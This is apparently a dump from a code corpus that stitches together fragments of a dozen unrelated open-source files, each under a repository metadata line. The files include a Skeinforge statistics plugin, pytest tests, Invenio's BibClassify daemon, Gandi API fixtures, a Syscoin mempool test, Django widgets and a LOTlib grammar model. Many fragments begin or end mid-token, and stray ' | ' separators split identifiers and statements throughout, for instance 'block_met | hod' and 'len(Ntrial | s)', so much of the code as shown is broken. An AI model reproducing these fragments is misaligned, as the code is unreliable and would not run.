Build time is 18 minutes 47 seconds.
Distance extruded is 46558.4 mm.
Distance traveled is 58503.3 mm.
Extruder speed is 50.0
Extruder was extruding 79.6 percent of the time.
Extruder was toggled 1688 times.
Operating flow rate is 9.8 mm3/s.
Feed rate average is 51.9 mm/s, (3113.8 mm/min).
Filament
Cross section area is 0.2 mm2.
Extrusion diameter is 0.5 mm.
Extrusion fill density ratio is 0.68
Material
Mass extruded is 9.8 grams.
Volume extruded is 9.1 cc.
Meta
Text has 33738 lines and a size of 1239.0 KB.
Version is 11.09.28
Procedures
carve
bottom
preface
inset
fill
multiply
speed
temperature
raft
skirt
dimension
bookend
Profile
UM-PLA-HighQuality
Slice
Edge width is 0.72 mm.
Layer height is 0.4 mm.
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from fabmetheus_utilities.vector3 import Vector3
from fabmetheus_utilities import archive
from fabmetheus_utilities import euclidean
from fabmetheus_utilities import gcodec
from fabmetheus_utilities import settings
from skeinforge_application.skeinforge_utilities import skeinforge_polyfile
from skeinforge_application.skeinforge_utilities import skeinforge_profile
import cStringIO
import math
import sys
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
def getNewRepository():
'Get new repository.'
return StatisticRepository()
def getWindowAnalyzeFile(fileName):
"Write statistics for a gcode file."
return getWindowAnalyzeFileGivenText( fileName, archive.getFileText(fileName) )
def getWindowAnalyzeFileGivenText( fileName, gcodeText, repository=None):
"Write statistics for a gcode file."
print('')
print('')
print('Statistics are being generated for the file ' + archive.getSummarizedFileName(fileName) )
if repository == None:
repository = settings.getReadRepository( StatisticRepository() )
skein = StatisticSkein()
statisticGcode = skein.getCraftedGcode(gcodeText, repository)
if repository.printStatistics.value:
print(statisticGcode)
if repository.saveStatistics.value:
archive.writeFileMessageEnd('.txt', fileName, statisticGcode, 'The statistics file is saved as ')
def writeOutput(fileName, fileNamePenultimate, fileNameSuffix, filePenultimateWritten, gcodeText=''):
"Write statistics for a skeinforge gcode file, if 'Write Statistics File for Skeinforge Chain' is selected."
repository = settings.getReadRepository( StatisticRepository() )
if gcodeText == '':
gcodeText = archive.getFileText( fileNameSuffix )
if repository.activateStatistic.value:
getWindowAnalyzeFileGivenText( fileNameSuffix, gcodeText, repository )
class StatisticRepository:
"A class to handle the statistics settings."
def __init__(self):
"Set the default settings, execute title & settings fileName."
skeinforge_profile.addListsToCraftTypeRepository('skeinforge_application.skeinforge_plugins.analyze_plugins.statistic.html', self)
self.openWikiManualHelpPage = settings.HelpPage().getOpenFromAbsolute('http://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Statistic')
self.activateStatistic = settings.BooleanSetting().getFromValue('Activate Statistic', self, True )
settings.LabelSeparator().getFromRepository(self)
settings.LabelDisplay().getFromName('- Cost -', self )
self.machineTime = settings.FloatSpin().getFromValue( 0.0, 'Machine Time ($/hour):', self, 5.0, 1.0 )
self.material = settings.FloatSpin().getFromValue( 0.0, 'Material ($/kg):', self, 40.0, 20.0 )
settings.LabelSeparator().getFromRepository(self)
self.density = settings.FloatSpin().getFromValue( 500.0, 'Density (kg/m3):', self, 2000.0, 930.0 )
self.fileNameInput = settings.FileNameInput().getFromFileName( [ ('Gcode text files', '*.gcode') ], 'Open File to Generate Statistics for', self, '')
self.printStatistics = settings.BooleanSetting().getFromValue('Print Statistics', self, True )
self.saveStatistics = settings.BooleanSetting().getFromValue('Save Statistics', self, False )
self.executeTitle = 'Generate Statistics'
def execute(self):
"Write button has been clicked."
fileNames = skeinforge_polyfile.getFileOrGcodeDirectory( self.fileNameInput.value, self.fileNameInput.wasCancelled, ['_comment'] )
for fileName in fileNames:
getWindowAnalyzeFile(fileName)
class StatisticSkein:
"A class to get statistics for a gcode skein."
def __init__(self):
self.extrusionDiameter = None
self.oldLocation = None
self.operatingFeedRatePerSecond = None
self.output = cStringIO.StringIO()
self.profileName = None
self.version = None
self.volumeFraction = None
def addLine(self, line):
"Add a line of text and a newline to the output."
self.output.write(line + '\n')
def addToPath(self, location):
"Add a point to travel and maybe extrusion."
if self.oldLocation != None:
travel = location.distance( self.oldLocation )
if self.feedRateMinute > 0.0:
self.totalBuildTime += 60.0 * travel / self.feedRateMinute
self.totalDistanceTraveled += travel
if self.extruderActive:
self.totalDistanceExtruded += travel
self.cornerMaximum.maximize(location)
self.cornerMinimum.minimize(location)
self.oldLocation = location
def extruderSet( self, active ):
"Maybe increment the number of times the extruder was toggled."
if self.extruderActive != active:
self.extruderToggled += 1
self.extruderActive = active
def getCraftedGcode(self, gcodeText, repository):
"Parse gcode text and store the statistics."
self.absoluteEdgeWidth = 0.4
self.characters = 0
self.cornerMaximum = Vector3(-987654321.0, -987654321.0, -987654321.0)
self.cornerMinimum = Vector3(987654321.0, 987654321.0, 987654321.0)
self.extruderActive = False
self.extruderSpeed = None
self.extruderToggled = 0
self.feedRateMinute = 600.0
self.filamentDiameter = 3.0
self.layerHeight = 0.4
self.numberOfLines = 0
self.procedures = []
self.repository = repository
self.totalBuildTime = 0.0
self.totalDistanceExtruded = 0.0
self.totalDistanceTraveled = 0.0
lines = archive.getTextLines(gcodeText)
for line in li |
jason-neal/companion_simulations | tests/utilities/test_spectrum_utils.py | Python | mit | 1,224 | 0.000817 | import os
import numpy as np
import pytest
from spectrum_overload import Spectrum
from mingle.utilities.spectrum_utils import load_spectrum, select_observation
@pytest.mark.parametrize("fname", ["HD30501-1-mixavg-tellcorr_1.fits", "HD30501-1-mixavg-h2otellcorr_1.fits"])
def test_load_spectrum(fname):
fname = os.path.join("tests", "testdata", "handy_spectra", fname)
results = load_spectrum(fname)
assert isinstance(results, Spectrum)
assert results.header["OBJECT"].upper() == "HD30501"
assert np.all(results.xaxis > 2110) # nm
assert np.all(results.xaxis < 2130) # nm
assert np.all(results.flux < 2)
assert np.all(results.flux >= 0)
def test_load_no_filename_fits():
"""Not a valid file."""
with pytest.raises(ValueError):
load_spectrum("")
@pytest.mark.parametrize("chip", [0, None, 5, 42])
def test_select_observation_with_bad_chip(chip):
with pytest.raises(ValueError):
select_observation("HD30501", "1", chip)
@pytest.mark.xfail()
def test_spectrum_plotter(spectra, label=None, show=False):
"""Plot a Spectrum object."""
assert False
@pytest.mark.xfail()
def test_plot_spectra(obs, model):
"""Plot two spectra."""
assert False
|
zuosc/PythonCode | OOP/subclass.py | Python | mit | 378 | 0.002717 | #!/usr/bin/env python3
# _*_ coding:utf8 _*_
# Power by zuosc 2016-10-23
'subclass demo: inheritance and polymorphism'
class Animal(object):
def run(self):
print('Animal is running......')
class Dog(Animal):
def run(self):
print('Dog is running.....')
def eat(self):
print('dog is eating......')
class Cat(Animal):
pass
dog = Dog()
dog.run() |
yohell/msaview | msaview_plugin_disopred/__init__.py | Python | mit | 4,493 | 0.004229 | """MSAView - Disopred support.
Copyright (c) 2011 Joel Hedlund.
Contact: Joel Hedlund <yohell@ifm.liu.se>
MSAView is a modular, configurable and extensible package for analysing and
visualising multiple sequence alignments and sequence features.
This package provides support for parsing disopred result files (must be
named according to sequence id, e.g: O43736.disopred).
If you have problems with this package, please contact the author.
Copyright
=========
The MIT License
Copyright (c) 2011 Joel Hedlund.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
__version__ = "0.9.0"
import os
from msaview import action
from msaview.options import Option
from msaview.features import (SequenceFeature,
make_regions,
map_region_to_msa)
class DisopredPrediction(object):
def __init__(self, sequence_id=None, sequence=None, regions=None):
self.sequence_id = sequence_id
self.sequence = sequence
if regions is None:
regions = []
self.regions = regions
@classmethod
def from_file(cls, f, sequence_id=None):
if sequence_id is None:
sequence_id = os.path.splitext(os.path.basename(f.name))[0]
sequence = []
prediction = []
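# disopred output interleaves 'aa:' residue lines with 'pred:' prediction
# lines; '*' marks a residue predicted as disordered (see make_regions below)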
for line in f:
words = line.split()
if len(words) != 2:
continue
linetype = words[0].lower()
if linetype == 'aa:':
sequence.append(words[1])
elif linetype == 'pred:':
prediction.append(words[1])
regions = make_regions(''.join(prediction), '*')
return cls(sequence_id, sequence=''.join(sequence), regions=regions)
class ImportDisopredRegions(action.Action):
action_name = 'import-disopred-predictions'
path = ['Import', 'Sequence features', 'Disopred predictions for sequence']
tooltip = 'Import predictions of natively disordered regions from a disopred result file.'
@classmethod
def applicable(cls, target, coord=None):
if target.msaview_classname != 'data.msa':
return
if not coord or not coord.sequence:
return
return cls(target, coord)
def get_options(self):
location = ''
if self.target:
if self.target.path:
location = os.path.dirname(self.target.path)
location = os.path.join(location, self.target.ids[self.coord.sequence] + '.disopred')
return [Option(None, 'location', location, location, 'Location', 'Disopred prediction file to load.')]
def run(self):
f = open(self.params['location'])
prediction = DisopredPrediction.from_file(f)
f.close()
if not prediction:
return
sequence_index = self.coord.sequence
offset = prediction.sequence.find(self.target.unaligned[sequence_index])
if offset < 0:
return
msa_positions = self.target.msa_positions[sequence_index]
sequence_id = self.target.ids[sequence_index]
features = []
for region in prediction.regions:
mapping = map_region_to_msa(region, msa_positions, offset)
if not mapping:
continue
features.append(SequenceFeature(sequence_index, sequence_id, 'disopred', 'natively disordered', region, mapping))
self.target.features.add_features(features)
action.register_action(ImportDisopredRegions)
|
Panos512/invenio | modules/bibclassify/lib/bibclassify_daemon.py | Python | gpl-2.0 | 15,602 | 0.006858 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
BibClassify daemon.
FIXME: the code below requires collection table to be updated to add column:
clsMETHOD_fk mediumint(9) unsigned NOT NULL,
This is not clean and should be fixed.
This module IS NOT standalone safe - it should never be run so.
"""
import sys
import time
import os
from invenio import bibclassify_config as bconfig
from invenio import bibclassify_text_extractor
from invenio import bibclassify_engine
from invenio import bibclassify_webinterface
from invenio import bibtask
from invenio.dbquery import run_sql
from invenio.intbitset import intbitset
from invenio.search_engine import get_collection_reclist
from invenio.bibdocfile import BibRecDocs
# Global variables allowing to retain the progress of the task.
_INDEX = 0
_RECIDS_NUMBER = 0
## INTERFACE
def bibclassify_daemon():
"""Constructs the BibClassify bibtask."""
bibtask.task_init(authorization_action='runbibclassify',
authorization_msg="BibClassify Task Submission",
description="Extract keywords and create a BibUpload "
"task.\nExamples:\n"
" $ bibclassify\n"
" $ bibclassify -i 79 -k HEP\n"
" $ bibclassify -c 'Articles' -k HEP\n",
help_specific_usage=" -i, --recid\t\tkeywords are extracted from "
"this record\n"
" -c, --collection\t\tkeywords are extracted from this collection\n"
" -k, --taxonomy\t\tkeywords are based on that reference",
version="Invenio BibClassify v%s" % bconfig.VERSION,
specific_params=("i:c:k:f",
[
"recid=",
"collection=",
"taxonomy=",
"force"
]),
task_submit_elaborate_specific_parameter_fnc=
_task_submit_elaborate_specific_parameter,
task_submit_check_options_fnc=_task_submit_check_options,
task_run_fnc=_task_run_core)
## PRIVATE METHODS
def _ontology_exists(ontology_name):
"""Check if the ontology name is registered in the database."""
if run_sql("SELECT name FROM clsMETHOD WHERE name=%s",
(ontology_name,)):
return True
return False
def _collection_exists(collection_name):
"""Check if the collection name is registered in the database."""
if run_sql("SELECT name FROM collection WHERE name=%s",
(collection_name,)):
return True
return False
def _recid_exists(recid):
"""Check if the recid number is registered in the database."""
if run_sql("SELECT id FROM bibrec WHERE id=%s",
(recid,)):
return True
return False
def _get_recids_foreach_ontology(recids=None, collections=None, taxonomy=None):
"""Returns an array containing hash objects containing the
collection, its corresponding ontology and the records belonging to
the given collection."""
rec_onts = []
# User specified record IDs.
if recids:
rec_onts.append({
'ontology': taxonomy,
'collection': None,
'recIDs': recids,
})
return rec_onts
# User specified collections.
if collections:
for collection in collections:
records = get_collection_reclist(collection)
if records:
rec_onts.append({
'ontology': taxonomy,
'collection': collection,
'recIDs': records
})
return rec_onts
# Use rules found in collection_clsMETHOD.
result = run_sql("SELECT clsMETHOD.name, clsMETHOD.last_updated, "
"collection.name FROM clsMETHOD JOIN collection_clsMETHOD ON "
"clsMETHOD.id=id_clsMETHOD JOIN collection ON "
"id_collection=collection.id")
for ontology, date_last_run, collection in result:
records = get_collection_reclist(collection)
if records:
if not date_last_run:
bibtask.write_message("INFO: Collection %s has not been previously "
"analyzed." % collection, stream=sys.stderr, verbose=3)
modified_records = intbitset(run_sql("SELECT id FROM bibrec"))
elif bibtask.task_get_option('force'):
bibtask.write_message("INFO: Analysis is forced for collection %s." %
collection, stream=sys.stderr, verbose=3)
modified_records = intbitset(run_sql("SELECT id FROM bibrec"))
else:
modified_records = bibtask.get_modified_records_since(date_last_run)
records &= modified_records
if records:
rec_onts.append({
'ontology': ontology,
'collection': collection,
'recIDs': records
})
else:
bibtask.write_message("WARNING: All records from collection '%s' have "
"already been analyzed for keywords with ontology '%s' "
"on %s." % (collection, ontology, date_last_run),
stream=sys.stderr, verbose=2)
else:
bibtask.write_message("ERROR: Collection '%s' doesn't contain any record. "
"Cannot analyse keywords." % (collection,),
stream=sys.stderr, verbose=0)
return rec_onts
def _update_date_of_last_run(runtime):
"""Update bibclassify daemon table information about last run time."""
run_sql("UPDATE clsMETHOD SET last_updated=%s", (runtime,))
def _task_submit_elaborate_specific_parameter(key, value, opts, args):
"""Given the string key it checks it's meaning, eventually using the
value. Usually it fills some key in the options dict.
It must return True if it has elaborated the key, False, if it doesn't
know that key.
eg:
if key in ('-n', '--number'):
bibtask.task_get_option(\1) = value
return True
return False
"""
# Recid option
if key in ("-i", "--recid"):
try:
value = int(value)
except ValueError:
bibtask.write_message("The value specified for --recid must be a "
"valid integer, not '%s'." % value, stream=sys.stderr,
verbose=0)
if not _recid_exists(value):
bibtask.write_message("ERROR: '%s' is not a valid record ID." % value,
stream=sys.stderr, verbose=0)
return False
recids = bibtask.task_get_option('recids')
if recids is None:
recids = []
recids.append(value)
bibtask.task_set_option('recids', recids)
# Collection option
elif key in ("-c", "--collection"):
if not _collection_exists(value):
bibtask.write_message("ERROR: '%s' is not a valid collection." % value,
stream=sys.stderr, verbose=0)
return False
collections = bibtask.task_get_option("collections")
collections = collections or []
collections.append(value)
bibtask.task_set_option("collections", collections)
# Taxonomy option
elif key in ("-k", "--taxonomy"):
if not _ontology_exists(value):
bibtask.write_message("ERROR: '%s' is not a valid taxonomy name." % value,
stream=sys.stderr, verbose=0)
return False
bibtask.task_set_option("taxonomy", value)
elif key in ("-f", "--force"):
|
grigouze/gandi.cli | gandi/cli/tests/fixtures/_operation.py | Python | gpl-3.0 | 5,786 | 0 | try:
# python3
from xmlrpc.client import DateTime
except ImportError:
# python2
from xmlrpclib import DateTime
type_list = list
def list(options):
ret = [{'date_created': DateTime('20150915T18:29:16'),
'date_start': None,
'date_updated': DateTime('20150915T18:29:17'),
'errortype': None,
'eta': -1863666,
'id': 100100,
'cert_id': None,
'infos': {'extras': {},
'id': '',
'label': 'iheartcli.com',
'product_action': 'renew',
'product_name': 'com',
'product_type': 'domain',
'quantity': ''},
'last_error': None,
'params': {'auth_id': 99999999,
'current_year': 2015,
'domain': 'iheartcli.com',
'domain_id': 1234567,
'duration': 1,
'param_type': 'domain',
'remote_addr': '127.0.0.1',
'session_id': 2920674,
'tld': 'com',
'tracker_id': '621cb9f4-472d-4cc1-b4b9-b18cc61e2914'},
'session_id': 2920674,
'source': 'PXP561-GANDI',
'step': 'BILL',
'type': 'domain_renew'},
{'date_created': DateTime('20150505T00:00:00'),
'date_start': None,
'date_updated': DateTime('20150505T00:00:00'),
'errortype': None,
'eta': 0,
'id': 100200,
'cert_id': None,
'infos': {'extras': {},
'id': '',
'label': '',
'product_action': 'billing_prepaid_add_money',
'product_name': '',
'product_type': 'corporate',
'quantity': ''},
'last_error': None,
'params': {'amount': 50.0,
'auth_id': 99999999,
'param_type': 'prepaid_add_money',
'prepaid_id': 100000,
'remote_addr': '127.0.0.1',
'tracker_id': 'ab0e5e67-6ca7-4afc-8311-f20080f15cf1'},
'session_id': 9844958,
'source': 'PXP561-GANDI',
'step': 'BILL',
'type': 'billing_prepaid_add_money'},
{'step': 'RUN',
'cert_id': 710,
'id': 100300,
'type': 'certificate_update',
'params': {'cert_id': 710,
'param_type': 'certificate_update',
'prepaid_id': 100000,
'inner_step': 'comodo_oper_updated',
'dcv_method': 'email',
'csr': '-----BEGIN CERTIFICATE REQUEST-----'
'MIICxjCCAa4CAQAwgYAxCzAJBgNVBAYTAkZSMQsw'
'0eWfyJJTOypoToCtdGoye507GOsgIysfRWaExay5'
'-----END CERTIFICATE REQUEST-----',
'remote_addr': '127.0.0.1'}},
{'step': 'RUN',
'cert_id': 706,
'id': 100302,
'type': 'certificate_update',
'params': {'cert_id': 706,
'param_type': 'certificate_update',
'prepaid_id': 100000,
'inner_step': 'comodo_oper_updated',
'dcv_method': 'dns',
'csr': '-----BEGIN CERTIFICATE REQUEST-----'
'MIICxjCCAa4CAQAwgYAxCzAJBgNVBAYTAkZSMQsw'
'0eWfyJJTOypoToCtdGoye507GOsgIysfRWaExay5'
'-----END CERTIFICATE REQUEST-----',
'remote_addr': '127.0.0.1'}},
{'step': 'WAIT',
'cert_id': 701,
'id': 100303,
'type': 'certificate_update',
'params': {'cert_id': 706,
'param_type': 'certificate_update',
'prepaid_id': 100000,
'inner_step': 'check_email_sent',
'dcv_method': 'dns',
'remote_addr': '127.0.0.1'}},
{'step': 'RUN',
'id': 99001,
'vm_id': 152967,
'type': 'hosting_migration_vm',
'params': {'inner_step': 'wait_sync'}},
{'step': 'RUN',
'id': 99002,
'vm_id': 152966,
'type': 'hosting_migration_vm',
'params': {'inner_step': 'wait_finalize'}},
]
options.pop('sort_by', None)
options.pop('items_per_page', None)
def compare(op, option):
if isinstance(option, (type_list, tuple)):
return op in option
return op == option
for fkey in options:
ret = [op for op in ret if compare(op.get(fkey), options[fkey])]
return ret
def info(id):
if id == 200:
return {'step': 'DONE'}
if id == 300:
return {'step': 'DONE', 'vm_id': 9000}
if id == 400:
return {'step': 'DONE'}
if id == 600:
return {'step': 'DONE', 'type': 'certificate_update',
'params': {'cert_id': 710,
'param_type': 'certificate_update',
'prepaid_id': 100000,
'remote_addr': '127.0.0.1'}}
if id == 9900:
return {'step': 'DONE',
'type': 'hosting_migration_disk',
'params': {'to_dc_id': 3,
'from_dc_id': 1,
'inner_step': 'wait_finalize'},
'id': 9900}
return [oper for oper in list({}) if oper['id'] == id][0]
|
smarr/RTruffleSOM | src/som/interpreter/ast/nodes/specialized/to_do_node.py | Python | mit | 3,664 | 0.003821 | from rpython.rlib import jit
from ..expression_node import ExpressionNode
from .....vmobjects.block_ast import AstBlock
from .....vmobjects.double import Double
from .....vmobjects.integer import Integer
from .....vmobjects.method_ast import AstMethod
class AbstractToDoNode(ExpressionNode):
_immutable_fields_ = ['_rcvr_expr?', '_limit_expr?', '_body_expr?',
'_universe']
_child_nodes_ = ['_rcvr_expr', '_limit_expr', '_body_expr']
def __init__(self, rcvr_expr, limit_expr, body_expr, universe,
source_section = None):
ExpressionNode.__init__(self, source_section)
self._rcvr_expr = self.adopt_child(rcvr_expr)
self._limit_expr = self.adopt_child(limit_expr)
self._body_expr = self.adopt_child(body_expr)
self._universe = universe
def execute(self, frame):
rcvr = self._rcvr_expr.execute(frame)
limit = self._limit_expr.execute(frame)
body = self._body_expr.execute(frame)
self._do_loop(rcvr, limit, body)
return rcvr
def execute_evaluated(self, frame, rcvr, args):
self._do_loop(rcvr, args[0], args[1])
return rcvr
def get_printable_location(block_method):
assert isinstance(block_method, AstMethod)
return "#to:do: %s" % block_method.merge_point_string()
int_driver = jit.JitDriver(
greens=['block_method'],
reds='auto',
is_recursive=True,
# virtualizables=['frame'],
get_printable_location=get_printable_location)
class IntToIntDoNode(AbstractToDoNode):
def _do_loop(self, rcvr, limit, body_block):
block_met | hod | = body_block.get_method()
i = rcvr.get_embedded_integer()
top = limit.get_embedded_integer()
while i <= top:
int_driver.jit_merge_point(block_method = block_method)
block_method.invoke(body_block, [self._universe.new_integer(i)])
i += 1
@staticmethod
def can_specialize(selector, rcvr, args, node):
return (isinstance(args[0], Integer) and isinstance(rcvr, Integer) and
len(args) > 1 and isinstance(args[1], AstBlock) and
selector.get_embedded_string() == "to:do:")
@staticmethod
def specialize_node(selector, rcvr, args, node):
return node.replace(
IntToIntDoNode(node._rcvr_expr, node._arg_exprs[0],
node._arg_exprs[1], node._universe,
node._source_section))
double_driver = jit.JitDriver(
greens=['block_method'],
reds='auto',
is_recursive=True,
# virtualizables=['frame'],
get_printable_location=get_printable_location)
class IntToDoubleDoNode(AbstractToDoNode):
def _do_loop(self, rcvr, limit, body_block):
block_method = body_block.get_method()
i = rcvr.get_embedded_integer()
top = limit.get_embedded_double()
while i <= top:
double_driver.jit_merge_point(block_method = block_method)
block_method.invoke(body_block, [self._universe.new_integer(i)])
i += 1
@staticmethod
def can_specialize(selector, rcvr, args, node):
return (isinstance(args[0], Double) and isinstance(rcvr, Integer) and
len(args) > 1 and isinstance(args[1], AstBlock) and
selector.get_embedded_string() == "to:do:")
@staticmethod
def specialize_node(selector, rcvr, args, node):
return node.replace(
IntToDoubleDoNode(node._rcvr_expr, node._arg_exprs[0],
node._arg_exprs[1], node._universe,
node._source_section))
|
syscoin/syscoin | test/functional/mempool_resurrect.py | Python | mit | 2,589 | 0.001931 | #!/usr/bin/env python3
# Copyright (c) 2014-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test resurrection of mined transactions when the blockchain is re-organized."""
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal
from test_framework.wallet import MiniWallet
class MempoolCoinbaseTest(SyscoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
node = self.nodes[0]
wallet = MiniWallet(node)
# Add enough mature utxos to the wallet so that all txs spend confirmed coins
self.generate(wallet, 3)
self.generate(node, COINBASE_MATURITY)
| # Spend block 1/2/3's coinbase transactions
# Mine a block
# Create three more transactions, spen | ding the spends
# Mine another block
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again
blocks = []
spends1_ids = [wallet.send_self_transfer(from_node=node)['txid'] for _ in range(3)]
blocks.extend(self.generate(node, 1))
spends2_ids = [wallet.send_self_transfer(from_node=node)['txid'] for _ in range(3)]
blocks.extend(self.generate(node, 1))
spends_ids = set(spends1_ids + spends2_ids)
# mempool should be empty, all txns confirmed
assert_equal(set(node.getrawmempool()), set())
confirmed_txns = set(node.getblock(blocks[0])['tx'] + node.getblock(blocks[1])['tx'])
# Checks that all spend txns are contained in the mined blocks
assert spends_ids < confirmed_txns
# Use invalidateblock to re-org back
node.invalidateblock(blocks[0])
# All txns should be back in mempool with 0 confirmations
assert_equal(set(node.getrawmempool()), spends_ids)
# Generate another block, they should all get mined
blocks = self.generate(node, 1)
# mempool should be empty, all txns confirmed
assert_equal(set(node.getrawmempool()), set())
confirmed_txns = set(node.getblock(blocks[0])['tx'])
assert spends_ids < confirmed_txns
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
joke2k/faker | faker/utils/datasets.py | Python | mit | 535 | 0 | import operator
from collections import Counter
from functools import reduce
from typing import Dict, Tuple
def add_dicts(*args: Tuple[Dict, ...]) -> Dict:
"""
Adds two or more dicts together. Common keys will have their values added.
| For example::
>>> t1 = {'a':1, 'b':2}
>>> t2 = {'b':1, 'c':3}
>>> t3 = {'d':4}
>>> add_dicts(t1, t2, t3)
{'a': 1, 'c': 3, 'b': 3, | 'd': 4}
"""
counters = [Counter(arg) for arg in args]
return dict(reduce(operator.add, counters))
|
davidam/python-examples | nlp/ethnicolr/ethnicolr-example.py | Python | gpl-3.0 | 339 | 0 | #!/usr/bi | n/python
# -*- coding: utf-8 -*-
import pan | das as pd
from ethnicolr import census_ln, pred_census_ln
names = [{'name': 'smith'},
{'name': 'zhang'},
{'name': 'jackson'}]
df = pd.DataFrame(names)
print(df)
print(census_ln(df, 'name'))
print(census_ln(df, 'name', 2010))
print(pred_census_ln(df, 'name'))
|
Kromey/akwriters | api/utils.py | Python | mit | 1,500 | 0.001333 | import json
from django.http import HttpResponse
from django.utils.cache import add_never_cache_headers
class ApiResponse(HttpResponse):
"""JSON-encoded API response
I've arbitrarily decided that the API uses JSON responses. To ease the
encoding process and to ensure that the correct Content-Type is set, this
object simply takes an encodable data object and returns an HttpResponse
object that properly encapsulates it as JSON.
"""
def __init__(self, data):
"""Build a JSON-encoded API response."""
jdata = json.dumps(data, separators=(',', ':'))
super().__init__(jdata, content_type="application/json")
def apimethod(method):
"""Decorator for an API method to properly handle encoding API responses | .
The decorated method is expected to return a Python object that can be
encoded into JSON; it will then be magically transformed into one that
returns properly-encoded JSON."""
def wrapper(*args, **kwargs):
data = {
"meta": {
| "status": "OK",
},
"response": {}
}
try:
data["response"] = method(*args, **kwargs)
except Exception as e:
data["meta"]["status"] = "ERR"
data["meta"]["error"] = str(e)
response = ApiResponse(data)
# Ensure API responses are never cached
add_never_cache_headers(response)
return response
return wrapper
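# Illustrative sketch only (the view below is hypothetical, not part of this
# module): applying @apimethod to a plain function that returns a dict wraps
# the result in the {"meta": ..., "response": ...} envelope built above.
@apimethod
def _example_api_view(request):
    """Toy API method used purely to demonstrate the decorator."""
    return {"greeting": "hello"}
# Under a configured Django environment, _example_api_view(None) returns an
# ApiResponse whose JSON body is
# {"meta":{"status":"OK"},"response":{"greeting":"hello"}}.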
|
oscarmcm/django-places | places/widgets.py | Python | mit | 1,789 | 0 | # -*- coding: utf-8 -*-
from django.forms import widgets
from django.template.loader import render_to_string
from django.utils.translation import gettext_lazy as _
from .conf import settings
class PlacesWidget(widgets.MultiWidget):
template_name = 'places/widgets/places.html'
def __init__(self, attrs=None):
_widgets = (
widgets.TextInput(
attrs={'data-geo': 'formatted_address', 'data-id': 'map_place'}
),
widgets.TextInput(
attrs={
'data-geo': 'lat',
'data-id': 'map_latitude',
'placeholder': _('Latitude'),
}
),
widgets.TextInput(
attrs={
'data-geo': 'lng',
'data-id': 'map_longitude',
'placeholder': _('Longitude'),
}
),
)
super(PlacesWidget, self).__init__(_widgets, attrs)
def decompress(self, value):
if isinstance(value, str):
return value.rsplit(',')
if value:
return [value.place, value.latitude, value.longitude]
return [None, None]
def get_context(self, name, value, attrs):
context = super(PlacesWidget, self).get_context(name, value, attrs)
context['map_widget_height'] = settings.MAP_WIDGET_HEIGHT
context['map_options'] = settings.MAP_OPTIONS
context['marker_options'] = settings.MARKER_OPTIONS
return context
class Media:
js = (
'//maps.googleapis.com/maps/api/js?key={}&li | braries=places'.format(
settings.MAPS_API_KEY
),
'places/places.js',
)
| css = {'all': ('places/places.css',)}
|
joshrule/LOTlib | LOTlib/Inference/GrammarInference/SimpleGrammarHypothesis.py | Python | gpl-3.0 | 3,106 | 0.009981 | import numpy as np
from copy import deepcopy
from scipy.misc import logsumexp
from scipy.stats import binom
from LOTlib.Miscellaneous import sample1, self_update
from LOTlib.Hypotheses.Stochastics import *
class SimpleGrammarHypothesis(Hypothesis):
"""
A simple example of grammar inference that *only* fits grammar parameters. Not intended for real use.
"""
def __init__(self, Counts, L, GroupLength, prior_offset, Nyes, Ntrials, ModelResponse, value=None):
"""
Counts - nonterminal -> #h x #rules counts
Hypotheses - #h
L - group -> #h x 1 array
GroupLength - #groups (vector) - contains the number of trials per group
Nyes - #item ( #item = sum(GroupLength))
Ntrials - #item
ModelResponse - #h x #item - each hypothesis' response to the i'th item (1 or 0)
"""
assert sum(GroupLength) == len(Nyes) == len(Ntrial | s)
        L = np.array(L)
self_update(self,locals())
self.N_groups = len(GroupLength)
self.nts = Counts.keys() # all nonterminals
self.nrules = { nt: Counts[nt].shape[1] for nt in self.nts} # number of rules for each nonterminal
self.N_hyps = Counts[self.nts[0]].s | hape[0]
if value is None:
value = { nt: GibbsDirchlet(alpha=np.ones(self.nrules[nt]), proposal_scale=1000.) for nt in self.nts }
Hypothesis.__init__(self, value=value) # sets the value
@attrmem('likelihood')
def compute_likelihood(self, data, **kwargs):
# The likelihood of the human data
assert len(data) == 0
# compute each hypothesis' prior, fixed over all data
priors = np.ones(self.N_hyps) * self.prior_offset # #h x 1 vector
